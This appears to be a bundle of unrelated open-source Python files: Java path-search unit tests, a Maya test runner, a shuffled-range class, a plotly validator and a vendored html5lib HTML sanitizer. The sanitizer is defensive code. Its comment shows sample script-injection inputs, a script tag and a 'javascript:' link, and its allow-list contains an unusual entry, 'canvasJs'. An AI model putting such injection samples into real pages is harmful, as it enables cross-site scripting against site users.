    @mock.patch('sys.stdout.write')
    def test_search_command_darwin_cmd_is_java(self, sys_stdout_write):
        """test for search_command (cmd = java, darwin)"""
        test_cmd = 'java'
        test_path = 'test_path_te,st_cmd'
        test_hints = ['h1', 'h2']
        test_mock_return = 'test fugafuga'
        # test
        with mock.patch.object(path, 'check_java_path_in_darwin',
                               return_value=test_mock_return):
            ret = path.search_command(
                test_cmd, test_path, test_hints, verbose=True)
        sys_out_calls = [
            call('## Searching Command (%s)\n' % test_cmd),
            call('### Hint: %s\n' % test_hints[0]),
            call('### Hint: %s\n' % test_hints[1]),
        ]
        sys_stdout_write.assert_has_calls(sys_out_calls)
        self.assertEqual(ret, test_mock_return)

    @mock.patch('sys.platform', new='unknown')
    @mock.patch('sys.stdout.write')
    def test_search_command_unknown_platform(self, sys_stdout_write):
        """test for search_command (unknown platform)"""
        test_cmd = 'java'
        test_path = 'test_path_te,st_cmd'
        test_hints = ['h1', 'h2']
        # test
        ret = path.search_command(
            test_cmd, test_path, test_hints, verbose=True)
        sys_out_calls = [
            call('## Searching Command (%s)\n' % test_cmd),
            call('### Hint: %s\n' % test_hints[0]),
            call('### Hint: %s\n' % test_hints[1]),
        ]
        sys_stdout_write.assert_has_calls(sys_out_calls)
        self.assertEqual(ret, '')

    @mock.patch('sys.stdout.write')
    @mock.patch('subprocess.Popen')
    def test_check_java_path_in_darwin_not_fount(self, mock_subprocess, sys_stdout_write):
        """test for check_java_path_in_darwin (java not found)"""
        test_cmd = 'test cmd'
        from subprocess import PIPE
        mock_p = Mock()
        mock_p.communicate.return_value = ('', ' No Java runtime present')
        mock_subprocess.return_value = mock_p
        # test
        ret = path.check_java_path_in_darwin(test_cmd, verbose=True)
        sys_out_calls = [
            call('## Searching %s ... ' % (test_cmd)),
            call(' No Java runtime present\n')
        ]
        subprocess_calls = [
            call([test_cmd, '-version'], stdout=PIPE, stderr=PIPE),
        ]
        mock_p_calls = [
            call.wait(),
            call.communicate()
        ]
        sys_stdout_write.assert_has_calls(sys_out_calls)
        mock_subprocess.assert_has_calls(subprocess_calls)
        self.assertEqual(ret, '')
        mock_p.assert_has_calls(mock_p_calls)

    @mock.patch('sys.stdout.write')
    @mock.patch('subprocess.Popen')
    def test_check_java_path_in_darwin_found(self, mock_subprocess, sys_stdout_write):
        """test for check_java_path_in_darwin (java found)"""
        test_cmd = 'test cmd'
        from subprocess import PIPE
        mock_p = Mock()
        mock_p.communicate.return_value = ('', ' Java runtime present')
        mock_subprocess.return_value = mock_p
        # test
        ret = path.check_java_path_in_darwin(test_cmd, verbose=True)
        sys_out_calls = [
            call('## Searching %s ... ' % (test_cmd)),
            call(' Java runtime found.\n')
        ]
        subprocess_calls = [
            call([test_cmd, '-version'], stdout=PIPE, stderr=PIPE),
        ]
        mock_p_calls = [
            call.wait(),
            call.communicate()
        ]
        sys_stdout_write.assert_has_calls(sys_out_calls)
        mock_subprocess.assert_has_calls(subprocess_calls)
        self.assertEqual(ret, "/usr/bin/" + test_cmd)
        mock_p.assert_has_calls(mock_p_calls)


if __name__ == '__main__':
    unittest.main()
sugarsweetrobotics/wasanbon
test/test_admin_environment_plugin/test_setup/test_path.py
Python
gpl-3.0
8,743
# Copyright 2020 by Kurt Rathjen. All Rights Reserved.
#
# This library is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. This library is distributed in the
# hope that it will be useful, but WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
"""
# Example:
# RUN TEST SUITE
import mutils.tests
reload(mutils.tests)
mutils.tests.run()
"""
import unittest
import logging


logging.basicConfig(
    filemode='w',
    level=logging.DEBUG,
    format='%(levelname)s: %(funcName)s: %(message)s',
)


def testSuite():
    """
    Return a test suite containing all the tests.

    :rtype: unittest.TestSuite
    """
    import test_pose
    import test_anim
    import test_match
    import test_utils
    import test_attribute
    import test_mirrortable

    suite = unittest.TestSuite()

    s = unittest.makeSuite(test_pose.TestPose, 'test')
    suite.addTest(s)

    s = unittest.makeSuite(test_anim.TestAnim, 'test')
    suite.addTest(s)

    s = unittest.makeSuite(test_utils.TestUtils, 'test')
    suite.addTest(s)

    s = unittest.makeSuite(test_match.TestMatch, 'test')
    suite.addTest(s)

    s = unittest.makeSuite(test_attribute.TestAttribute, 'test')
    suite.addTest(s)

    s = unittest.makeSuite(test_mirrortable.TestMirrorTable, 'test')
    suite.addTest(s)

    return suite


def run():
    """
    Call from within Maya to run all valid tests.
    """
    import mutils.animation
    mutils.animation.FIX_SAVE_ANIM_REFERENCE_LOCKED_ERROR = True

    tests = unittest.TextTestRunner()
    tests.run(testSuite())
krathjen/studiolibrary
src/mutils/tests/run.py
Python
lgpl-3.0
1,998
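
One note on the suite construction in the file above: unittest.makeSuite is deprecated in recent Python 3 releases. The sketch below (not part of the original file) shows the equivalent TestLoader-based wiring; only two of the test modules are shown, and the rest would be added the same way.

# Sketch: the same suite built without the deprecated unittest.makeSuite.
import unittest

def testSuiteViaLoader():
    import test_pose
    import test_anim

    loader = unittest.TestLoader()
    suite = unittest.TestSuite()
    suite.addTests(loader.loadTestsFromTestCase(test_pose.TestPose))
    suite.addTests(loader.loadTestsFromTestCase(test_anim.TestAnim))
    # ...remaining modules (test_match, test_utils, etc.) follow the same pattern
    return suite
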
#!/usr/bin/python
import itertools
import random
#import sys


class ShufXRange(object):
    def __init__(self, *args):
        if len(args) == 1:
            self.min = 0
            self.max = args[0]
        else:
            self.min = args[0]
            self.max = args[1]
        self.int_tuple = tuple(range(self.min, self.max))
        self.shuffle()
        self.row_cycle = iter(self)

    def __len__(self):
        return len(self.int_tuple)

    def __getitem__(self, index):
        return self.int_tuple[index]

    # def __list__(self):
    #     return self.int_list

    def __iter__(self):
        return itertools.cycle(list(self.int_tuple))
        #return self.int_list

    #def __iter__(self):
    #    return iter(self.int_list)
    #
    #def __next__(self):
    #    return next(self.row_cycle)
    #
    #def next(self):
    #    int_list = list(self.int_tuple)
    #    if not int_list:
    #        raise StopIteration
    #    return int_list.pop(0)
    #
    #def __next__(self):
    #    for n in iter(self):
    #        yield n
    #
    #def __iter__(self):
    #    for n in iter(self.int_list):
    #        yield n

    def __str__(self):
        result = ''
        for i in self.int_tuple:
            result += str(i)
            if i <= len(self):
                result += ' '
        return result

    #def __next__(self):
    #    while True:
    #        yield next(iter(int_list))

    def shuffle(self):
        # Fisher-Yates shuffle over the stored values: walk backwards and swap
        # each slot with a randomly chosen earlier (or same) slot. Indexing is
        # based on the list length so it stays valid even when min != 0.
        int_list = list(self.int_tuple)
        for i in range(len(int_list) - 1, 0, -1):
            j = random.randint(0, i)
            int_list[i], int_list[j] = int_list[j], int_list[i]
        self.int_tuple = tuple(int_list)
        return self


class ShufRange(object):
    def __init__(self, min, max):
        self.shuf_obj = ShufXRange(min, max)
        self.iterer = iter(self.shuf_obj)

    def __str__(self):
        return str(self.shuf_obj)

    def __iter__(self):
        return self.iterer
hammerhorn/hammerhorn-jive
igo/cjh/shuf_range.py
Python
gpl-2.0
2,051
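
A brief, hypothetical usage sketch for the classes in the file above (not part of the original source): ShufXRange stores a shuffled permutation of the requested range, and iterating it cycles over that permutation indefinitely.

# Hypothetical usage sketch for ShufXRange, assuming the class above is defined.
r = ShufXRange(5)                     # a shuffled permutation of 0..4
print(len(r), r.int_tuple)            # e.g. 5 (3, 0, 4, 1, 2)

it = iter(r)                          # itertools.cycle over the shuffled values
print([next(it) for _ in range(10)])  # the same permutation, repeated twice
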
import _plotly_utils.basevalidators


class ColorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
    def __init__(
        self, plotly_name="colorsrc", parent_name="histogram.hoverlabel.font", **kwargs
    ):
        super(ColorsrcValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=kwargs.pop("edit_type", "none"),
            role=kwargs.pop("role", "info"),
            **kwargs
        )
plotly/python-api
packages/python/plotly/plotly/validators/histogram/hoverlabel/font/_colorsrc.py
Python
mit
473
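
For orientation, a hedged sketch (not part of the original file) of the figure-schema path this validator guards: colorsrc sits under histogram.hoverlabel.font, so it is reachable through the ordinary graph-objects API. The grid column reference string below is a made-up placeholder.

# Hypothetical sketch: setting the property validated by ColorsrcValidator above.
import plotly.graph_objects as go

fig = go.Figure(
    go.Histogram(
        x=[1, 2, 2, 3, 3, 3],
        hoverlabel=dict(font=dict(colorsrc="placeholder-grid-column-id")),
    )
)
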
from __future__ import absolute_import, division, unicode_literals import re from xml.sax.saxutils import escape, unescape from pip._vendor.six.moves import urllib_parse as urlparse from . import base from ..constants import namespaces, prefixes __all__ = ["Filter"] allowed_elements = frozenset(( (namespaces['html'], 'a'), (namespaces['html'], 'abbr'), (namespaces['html'], 'acronym'), (namespaces['html'], 'address'), (namespaces['html'], 'area'), (namespaces['html'], 'article'), (namespaces['html'], 'aside'), (namespaces['html'], 'audio'), (namespaces['html'], 'b'), (namespaces['html'], 'big'), (namespaces['html'], 'blockquote'), (namespaces['html'], 'br'), (namespaces['html'], 'button'), (namespaces['html'], 'canvasJs'), (namespaces['html'], 'caption'), (namespaces['html'], 'center'), (namespaces['html'], 'cite'), (namespaces['html'], 'code'), (namespaces['html'], 'col'), (namespaces['html'], 'colgroup'), (namespaces['html'], 'command'), (namespaces['html'], 'datagrid'), (namespaces['html'], 'datalist'), (namespaces['html'], 'dd'), (namespaces['html'], 'del'), (namespaces['html'], 'details'), (namespaces['html'], 'dfn'), (namespaces['html'], 'dialog'), (namespaces['html'], 'dir'), (namespaces['html'], 'div'), (namespaces['html'], 'dl'), (namespaces['html'], 'dt'), (namespaces['html'], 'em'), (namespaces['html'], 'event-source'), (namespaces['html'], 'fieldset'), (namespaces['html'], 'figcaption'), (namespaces['html'], 'figure'), (namespaces['html'], 'footer'), (namespaces['html'], 'font'), (namespaces['html'], 'form'), (namespaces['html'], 'header'), (namespaces['html'], 'h1'), (namespaces['html'], 'h2'), (namespaces['html'], 'h3'), (namespaces['html'], 'h4'), (namespaces['html'], 'h5'), (namespaces['html'], 'h6'), (namespaces['html'], 'hr'), (namespaces['html'], 'i'), (namespaces['html'], 'img'), (namespaces['html'], 'input'), (namespaces['html'], 'ins'), (namespaces['html'], 'keygen'), (namespaces['html'], 'kbd'), (namespaces['html'], 'label'), (namespaces['html'], 'legend'), (namespaces['html'], 'li'), (namespaces['html'], 'm'), (namespaces['html'], 'map'), (namespaces['html'], 'menu'), (namespaces['html'], 'meter'), (namespaces['html'], 'multicol'), (namespaces['html'], 'nav'), (namespaces['html'], 'nextid'), (namespaces['html'], 'ol'), (namespaces['html'], 'output'), (namespaces['html'], 'optgroup'), (namespaces['html'], 'option'), (namespaces['html'], 'p'), (namespaces['html'], 'pre'), (namespaces['html'], 'progress'), (namespaces['html'], 'q'), (namespaces['html'], 's'), (namespaces['html'], 'samp'), (namespaces['html'], 'section'), (namespaces['html'], 'select'), (namespaces['html'], 'small'), (namespaces['html'], 'sound'), (namespaces['html'], 'source'), (namespaces['html'], 'spacer'), (namespaces['html'], 'span'), (namespaces['html'], 'strike'), (namespaces['html'], 'strong'), (namespaces['html'], 'sub'), (namespaces['html'], 'sup'), (namespaces['html'], 'table'), (namespaces['html'], 'tbody'), (namespaces['html'], 'td'), (namespaces['html'], 'textarea'), (namespaces['html'], 'time'), (namespaces['html'], 'tfoot'), (namespaces['html'], 'th'), (namespaces['html'], 'thead'), (namespaces['html'], 'tr'), (namespaces['html'], 'tt'), (namespaces['html'], 'u'), (namespaces['html'], 'ul'), (namespaces['html'], 'var'), (namespaces['html'], 'video'), (namespaces['mathml'], 'maction'), (namespaces['mathml'], 'math'), (namespaces['mathml'], 'merror'), (namespaces['mathml'], 'mfrac'), (namespaces['mathml'], 'mi'), (namespaces['mathml'], 'mmultiscripts'), (namespaces['mathml'], 'mn'), 
(namespaces['mathml'], 'mo'), (namespaces['mathml'], 'mover'), (namespaces['mathml'], 'mpadded'), (namespaces['mathml'], 'mphantom'), (namespaces['mathml'], 'mprescripts'), (namespaces['mathml'], 'mroot'), (namespaces['mathml'], 'mrow'), (namespaces['mathml'], 'mspace'), (namespaces['mathml'], 'msqrt'), (namespaces['mathml'], 'mstyle'), (namespaces['mathml'], 'msub'), (namespaces['mathml'], 'msubsup'), (namespaces['mathml'], 'msup'), (namespaces['mathml'], 'mtable'), (namespaces['mathml'], 'mtd'), (namespaces['mathml'], 'mtext'), (namespaces['mathml'], 'mtr'), (namespaces['mathml'], 'munder'), (namespaces['mathml'], 'munderover'), (namespaces['mathml'], 'none'), (namespaces['svg'], 'a'), (namespaces['svg'], 'animate'), (namespaces['svg'], 'animateColor'), (namespaces['svg'], 'animateMotion'), (namespaces['svg'], 'animateTransform'), (namespaces['svg'], 'clipPath'), (namespaces['svg'], 'circle'), (namespaces['svg'], 'defs'), (namespaces['svg'], 'desc'), (namespaces['svg'], 'ellipse'), (namespaces['svg'], 'font-face'), (namespaces['svg'], 'font-face-name'), (namespaces['svg'], 'font-face-src'), (namespaces['svg'], 'g'), (namespaces['svg'], 'glyph'), (namespaces['svg'], 'hkern'), (namespaces['svg'], 'linearGradient'), (namespaces['svg'], 'line'), (namespaces['svg'], 'marker'), (namespaces['svg'], 'metadata'), (namespaces['svg'], 'missing-glyph'), (namespaces['svg'], 'mpath'), (namespaces['svg'], 'path'), (namespaces['svg'], 'polygon'), (namespaces['svg'], 'polyline'), (namespaces['svg'], 'radialGradient'), (namespaces['svg'], 'rect'), (namespaces['svg'], 'set'), (namespaces['svg'], 'stop'), (namespaces['svg'], 'svg'), (namespaces['svg'], 'switch'), (namespaces['svg'], 'text'), (namespaces['svg'], 'title'), (namespaces['svg'], 'tspan'), (namespaces['svg'], 'use'), )) allowed_attributes = frozenset(( # HTML attributes (None, 'abbr'), (None, 'accept'), (None, 'accept-charset'), (None, 'accesskey'), (None, 'action'), (None, 'align'), (None, 'alt'), (None, 'autocomplete'), (None, 'autofocus'), (None, 'axis'), (None, 'background'), (None, 'balance'), (None, 'bgcolor'), (None, 'bgproperties'), (None, 'border'), (None, 'bordercolor'), (None, 'bordercolordark'), (None, 'bordercolorlight'), (None, 'bottompadding'), (None, 'cellpadding'), (None, 'cellspacing'), (None, 'ch'), (None, 'challenge'), (None, 'char'), (None, 'charoff'), (None, 'choff'), (None, 'charset'), (None, 'checked'), (None, 'cite'), (None, 'class'), (None, 'clear'), (None, 'color'), (None, 'cols'), (None, 'colspan'), (None, 'compact'), (None, 'contenteditable'), (None, 'controls'), (None, 'coords'), (None, 'data'), (None, 'datafld'), (None, 'datapagesize'), (None, 'datasrc'), (None, 'datetime'), (None, 'default'), (None, 'delay'), (None, 'dir'), (None, 'disabled'), (None, 'draggable'), (None, 'dynsrc'), (None, 'enctype'), (None, 'end'), (None, 'face'), (None, 'for'), (None, 'form'), (None, 'frame'), (None, 'galleryimg'), (None, 'gutter'), (None, 'headers'), (None, 'height'), (None, 'hidefocus'), (None, 'hidden'), (None, 'high'), (None, 'href'), (None, 'hreflang'), (None, 'hspace'), (None, 'icon'), (None, 'id'), (None, 'inputmode'), (None, 'ismap'), (None, 'keytype'), (None, 'label'), (None, 'leftspacing'), (None, 'lang'), (None, 'list'), (None, 'longdesc'), (None, 'loop'), (None, 'loopcount'), (None, 'loopend'), (None, 'loopstart'), (None, 'low'), (None, 'lowsrc'), (None, 'max'), (None, 'maxlength'), (None, 'media'), (None, 'method'), (None, 'min'), (None, 'multiple'), (None, 'name'), (None, 'nohref'), (None, 'noshade'), (None, 
'nowrap'), (None, 'open'), (None, 'optimum'), (None, 'pattern'), (None, 'ping'), (None, 'point-size'), (None, 'poster'), (None, 'pqg'), (None, 'preload'), (None, 'prompt'), (None, 'radiogroup'), (None, 'readonly'), (None, 'rel'), (None, 'repeat-max'), (None, 'repeat-min'), (None, 'replace'), (None, 'required'), (None, 'rev'), (None, 'rightspacing'), (None, 'rows'), (None, 'rowspan'), (None, 'rules'), (None, 'scope'), (None, 'selected'), (None, 'shape'), (None, 'size'), (None, 'span'), (None, 'src'), (None, 'start'), (None, 'step'), (None, 'style'), (None, 'summary'), (None, 'suppress'), (None, 'tabindex'), (None, 'target'), (None, 'template'), (None, 'title'), (None, 'toppadding'), (None, 'type'), (None, 'unselectable'), (None, 'usemap'), (None, 'urn'), (None, 'valign'), (None, 'value'), (None, 'variable'), (None, 'volume'), (None, 'vspace'), (None, 'vrml'), (None, 'width'), (None, 'wrap'), (namespaces['xml'], 'lang'), # MathML attributes (None, 'actiontype'), (None, 'align'), (None, 'columnalign'), (None, 'columnalign'), (None, 'columnalign'), (None, 'columnlines'), (None, 'columnspacing'), (None, 'columnspan'), (None, 'depth'), (None, 'display'), (None, 'displaystyle'), (None, 'equalcolumns'), (None, 'equalrows'), (None, 'fence'), (None, 'fontstyle'), (None, 'fontweight'), (None, 'frame'), (None, 'height'), (None, 'linethickness'), (None, 'lspace'), (None, 'mathbackground'), (None, 'mathcolor'), (None, 'mathvariant'), (None, 'mathvariant'), (None, 'maxsize'), (None, 'minsize'), (None, 'other'), (None, 'rowalign'), (None, 'rowalign'), (None, 'rowalign'), (None, 'rowlines'), (None, 'rowspacing'), (None, 'rowspan'), (None, 'rspace'), (None, 'scriptlevel'), (None, 'selection'), (None, 'separator'), (None, 'stretchy'), (None, 'width'), (None, 'width'), (namespaces['xlink'], 'href'), (namespaces['xlink'], 'show'), (namespaces['xlink'], 'type'), # SVG attributes (None, 'accent-height'), (None, 'accumulate'), (None, 'additive'), (None, 'alphabetic'), (None, 'arabic-form'), (None, 'ascent'), (None, 'attributeName'), (None, 'attributeType'), (None, 'baseProfile'), (None, 'bbox'), (None, 'begin'), (None, 'by'), (None, 'calcMode'), (None, 'cap-height'), (None, 'class'), (None, 'clip-path'), (None, 'color'), (None, 'color-rendering'), (None, 'content'), (None, 'cx'), (None, 'cy'), (None, 'd'), (None, 'dx'), (None, 'dy'), (None, 'descent'), (None, 'display'), (None, 'dur'), (None, 'end'), (None, 'fill'), (None, 'fill-opacity'), (None, 'fill-rule'), (None, 'font-family'), (None, 'font-size'), (None, 'font-stretch'), (None, 'font-style'), (None, 'font-variant'), (None, 'font-weight'), (None, 'from'), (None, 'fx'), (None, 'fy'), (None, 'g1'), (None, 'g2'), (None, 'glyph-name'), (None, 'gradientUnits'), (None, 'hanging'), (None, 'height'), (None, 'horiz-adv-x'), (None, 'horiz-origin-x'), (None, 'id'), (None, 'ideographic'), (None, 'k'), (None, 'keyPoints'), (None, 'keySplines'), (None, 'keyTimes'), (None, 'lang'), (None, 'marker-end'), (None, 'marker-mid'), (None, 'marker-start'), (None, 'markerHeight'), (None, 'markerUnits'), (None, 'markerWidth'), (None, 'mathematical'), (None, 'max'), (None, 'min'), (None, 'name'), (None, 'offset'), (None, 'opacity'), (None, 'orient'), (None, 'origin'), (None, 'overline-position'), (None, 'overline-thickness'), (None, 'panose-1'), (None, 'path'), (None, 'pathLength'), (None, 'points'), (None, 'preserveAspectRatio'), (None, 'r'), (None, 'refX'), (None, 'refY'), (None, 'repeatCount'), (None, 'repeatDur'), (None, 'requiredExtensions'), (None, 'requiredFeatures'), (None, 
'restart'), (None, 'rotate'), (None, 'rx'), (None, 'ry'), (None, 'slope'), (None, 'stemh'), (None, 'stemv'), (None, 'stop-color'), (None, 'stop-opacity'), (None, 'strikethrough-position'), (None, 'strikethrough-thickness'), (None, 'stroke'), (None, 'stroke-dasharray'), (None, 'stroke-dashoffset'), (None, 'stroke-linecap'), (None, 'stroke-linejoin'), (None, 'stroke-miterlimit'), (None, 'stroke-opacity'), (None, 'stroke-width'), (None, 'systemLanguage'), (None, 'target'), (None, 'text-anchor'), (None, 'to'), (None, 'transform'), (None, 'type'), (None, 'u1'), (None, 'u2'), (None, 'underline-position'), (None, 'underline-thickness'), (None, 'unicode'), (None, 'unicode-range'), (None, 'units-per-em'), (None, 'values'), (None, 'version'), (None, 'viewBox'), (None, 'visibility'), (None, 'width'), (None, 'widths'), (None, 'x'), (None, 'x-height'), (None, 'x1'), (None, 'x2'), (namespaces['xlink'], 'actuate'), (namespaces['xlink'], 'arcrole'), (namespaces['xlink'], 'href'), (namespaces['xlink'], 'role'), (namespaces['xlink'], 'show'), (namespaces['xlink'], 'title'), (namespaces['xlink'], 'type'), (namespaces['xml'], 'base'), (namespaces['xml'], 'lang'), (namespaces['xml'], 'space'), (None, 'y'), (None, 'y1'), (None, 'y2'), (None, 'zoomAndPan'), )) attr_val_is_uri = frozenset(( (None, 'href'), (None, 'src'), (None, 'cite'), (None, 'action'), (None, 'longdesc'), (None, 'poster'), (None, 'background'), (None, 'datasrc'), (None, 'dynsrc'), (None, 'lowsrc'), (None, 'ping'), (namespaces['xlink'], 'href'), (namespaces['xml'], 'base'), )) svg_attr_val_allows_ref = frozenset(( (None, 'clip-path'), (None, 'color-profile'), (None, 'cursor'), (None, 'fill'), (None, 'filter'), (None, 'marker'), (None, 'marker-start'), (None, 'marker-mid'), (None, 'marker-end'), (None, 'mask'), (None, 'stroke'), )) svg_allow_local_href = frozenset(( (None, 'altGlyph'), (None, 'animate'), (None, 'animateColor'), (None, 'animateMotion'), (None, 'animateTransform'), (None, 'cursor'), (None, 'feImage'), (None, 'filter'), (None, 'linearGradient'), (None, 'pattern'), (None, 'radialGradient'), (None, 'textpath'), (None, 'tref'), (None, 'set'), (None, 'use') )) allowed_css_properties = frozenset(( 'azimuth', 'background-color', 'border-bottom-color', 'border-collapse', 'border-color', 'border-left-color', 'border-right-color', 'border-top-color', 'clear', 'color', 'cursor', 'direction', 'display', 'elevation', 'float', 'font', 'font-family', 'font-size', 'font-style', 'font-variant', 'font-weight', 'height', 'letter-spacing', 'line-height', 'overflow', 'pause', 'pause-after', 'pause-before', 'pitch', 'pitch-range', 'richness', 'speak', 'speak-header', 'speak-numeral', 'speak-punctuation', 'speech-rate', 'stress', 'text-align', 'text-decoration', 'text-indent', 'unicode-bidi', 'vertical-align', 'voice-family', 'volume', 'white-space', 'width', )) allowed_css_keywords = frozenset(( 'auto', 'aqua', 'black', 'block', 'blue', 'bold', 'both', 'bottom', 'brown', 'center', 'collapse', 'dashed', 'dotted', 'fuchsia', 'gray', 'green', '!important', 'italic', 'left', 'lime', 'maroon', 'medium', 'none', 'navy', 'normal', 'nowrap', 'olive', 'pointer', 'purple', 'red', 'right', 'solid', 'silver', 'teal', 'top', 'transparent', 'underline', 'white', 'yellow', )) allowed_svg_properties = frozenset(( 'fill', 'fill-opacity', 'fill-rule', 'stroke', 'stroke-width', 'stroke-linecap', 'stroke-linejoin', 'stroke-opacity', )) allowed_protocols = frozenset(( 'ed2k', 'ftp', 'http', 'https', 'irc', 'mailto', 'news', 'gopher', 'nntp', 'telnet', 'webcal', 'xmpp', 
'callto', 'feed', 'urn', 'aim', 'rsync', 'tag', 'ssh', 'sftp', 'rtsp', 'afs', 'data', )) allowed_content_types = frozenset(( 'image/png', 'image/jpeg', 'image/gif', 'image/webp', 'image/bmp', 'text/plain', )) data_content_type = re.compile(r''' ^ # Match a content type <application>/<type> (?P<content_type>[-a-zA-Z0-9.]+/[-a-zA-Z0-9.]+) # Match any character set and encoding (?:(?:;charset=(?:[-a-zA-Z0-9]+)(?:;(?:base64))?) |(?:;(?:base64))?(?:;charset=(?:[-a-zA-Z0-9]+))?) # Assume the rest is data ,.* $ ''', re.VERBOSE) class Filter(base.Filter): """ sanitization of XHTML+MathML+SVG and of inline style attributes.""" def __init__(self, source, allowed_elements=allowed_elements, allowed_attributes=allowed_attributes, allowed_css_properties=allowed_css_properties, allowed_css_keywords=allowed_css_keywords, allowed_svg_properties=allowed_svg_properties, allowed_protocols=allowed_protocols, allowed_content_types=allowed_content_types, attr_val_is_uri=attr_val_is_uri, svg_attr_val_allows_ref=svg_attr_val_allows_ref, svg_allow_local_href=svg_allow_local_href): super(Filter, self).__init__(source) self.allowed_elements = allowed_elements self.allowed_attributes = allowed_attributes self.allowed_css_properties = allowed_css_properties self.allowed_css_keywords = allowed_css_keywords self.allowed_svg_properties = allowed_svg_properties self.allowed_protocols = allowed_protocols self.allowed_content_types = allowed_content_types self.attr_val_is_uri = attr_val_is_uri self.svg_attr_val_allows_ref = svg_attr_val_allows_ref self.svg_allow_local_href = svg_allow_local_href def __iter__(self): for token in base.Filter.__iter__(self): token = self.sanitize_token(token) if token: yield token # Sanitize the +html+, escaping all elements not in ALLOWED_ELEMENTS, and # stripping out all # attributes not in ALLOWED_ATTRIBUTES. Style # attributes are parsed, and a restricted set, # specified by # ALLOWED_CSS_PROPERTIES and ALLOWED_CSS_KEYWORDS, are allowed through. # attributes in ATTR_VAL_IS_URI are scanned, and only URI schemes specified # in ALLOWED_PROTOCOLS are allowed. # # sanitize_html('<script> do_nasty_stuff() </script>') # => &lt;script> do_nasty_stuff() &lt;/script> # sanitize_html('<a href="javascript: sucker();">Click here for $100</a>') # => <a>Click here for $100</a> def sanitize_token(self, token): # accommodate filters which use token_type differently token_type = token["type"] if token_type in ("StartTag", "EndTag", "EmptyTag"): name = token["name"] namespace = token["namespace"] if ((namespace, name) in self.allowed_elements or (namespace is None and (namespaces["html"], name) in self.allowed_elements)): return self.allowed_token(token) else: return self.disallowed_token(token) elif token_type == "Comment": pass else: return token def allowed_token(self, token): if "data" in token: attrs = token["data"] attr_names = set(attrs.keys()) # Remove forbidden attributes for to_remove in (attr_names - self.allowed_attributes): del token["data"][to_remove] attr_names.remove(to_remove) # Remove attributes with disallowed URL values for attr in (attr_names & self.attr_val_is_uri): assert attr in attrs # I don't have a clue where this regexp comes from or why it matches those # characters, nor why we call unescape. I just know it's always been here. # Should you be worried by this comment in a sanitizer? Yes. On the other hand, all # this will do is remove *more* than it otherwise would. 
val_unescaped = re.sub("[`\x00-\x20\x7f-\xa0\s]+", '', unescape(attrs[attr])).lower() # remove replacement characters from unescaped characters val_unescaped = val_unescaped.replace("\ufffd", "") try: uri = urlparse.urlparse(val_unescaped) except ValueError: uri = None del attrs[attr] if uri and uri.scheme: if uri.scheme not in self.allowed_protocols: del attrs[attr] if uri.scheme == 'data': m = data_content_type.match(uri.path) if not m: del attrs[attr] elif m.group('content_type') not in self.allowed_content_types: del attrs[attr] for attr in self.svg_attr_val_allows_ref: if attr in attrs: attrs[attr] = re.sub(r'url\s*\(\s*[^#\s][^)]+?\)', ' ', unescape(attrs[attr])) if (token["name"] in self.svg_allow_local_href and (namespaces['xlink'], 'href') in attrs and re.search('^\s*[^#\s].*', attrs[(namespaces['xlink'], 'href')])): del attrs[(namespaces['xlink'], 'href')] if (None, 'style') in attrs: attrs[(None, 'style')] = self.sanitize_css(attrs[(None, 'style')]) token["data"] = attrs return token def disallowed_token(self, token): token_type = token["type"] if token_type == "EndTag": token["data"] = "</%s>" % token["name"] elif token["data"]: assert token_type in ("StartTag", "EmptyTag") attrs = [] for (ns, name), v in token["data"].items(): attrs.append(' %s="%s"' % (name if ns is None else "%s:%s" % (prefixes[ns], name), escape(v))) token["data"] = "<%s%s>" % (token["name"], ''.join(attrs)) else: token["data"] = "<%s>" % token["name"] if token.get("selfClosing"): token["data"] = token["data"][:-1] + "/>" token["type"] = "Characters" del token["name"] return token def sanitize_css(self, style): # disallow urls style = re.compile('url\s*\(\s*[^\s)]+?\s*\)\s*').sub(' ', style) # gauntlet if not re.match("""^([:,;#%.\sa-zA-Z0-9!]|\w-\w|'[\s\w]+'|"[\s\w]+"|\([\d,\s]+\))*$""", style): return '' if not re.match("^\s*([-\w]+\s*:[^:;]*(;\s*|$))*$", style): return '' clean = [] for prop, value in re.findall("([-\w]+)\s*:\s*([^:;]*)", style): if not value: continue if prop.lower() in self.allowed_css_properties: clean.append(prop + ': ' + value + ';') elif prop.split('-')[0].lower() in ['background', 'border', 'margin', 'padding']: for keyword in value.split(): if keyword not in self.allowed_css_keywords and \ not re.match("^(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)$", keyword): # noqa break else: clean.append(prop + ': ' + value + ';') elif prop.lower() in self.allowed_svg_properties: clean.append(prop + ': ' + value + ';') return ' '.join(clean)
tstieven/amiunique
website/venv/lib/python2.7/site-packages/pip/_vendor/html5lib/filters/sanitizer.py
Python
mit
25,114
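
A hedged usage sketch for the sanitizer above, written against the standalone html5lib distribution rather than the pip-vendored copy: parse a fragment, stream it through the sanitizing Filter, and re-serialize it. The sample fragment is an illustration-only assumption.

# Hedged sketch: sanitize an HTML fragment with html5lib's sanitizer Filter.
import html5lib
from html5lib import treewalkers
from html5lib.filters import sanitizer
from html5lib.serializer import HTMLSerializer

fragment = '<p onclick="evil()">hi <script>alert(1)</script></p>'
tree = html5lib.parseFragment(fragment, treebuilder="etree")
walker = treewalkers.getTreeWalker("etree")
clean = HTMLSerializer().render(sanitizer.Filter(walker(tree)))
print(clean)  # the onclick attribute is dropped; <script> is escaped, not kept live
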
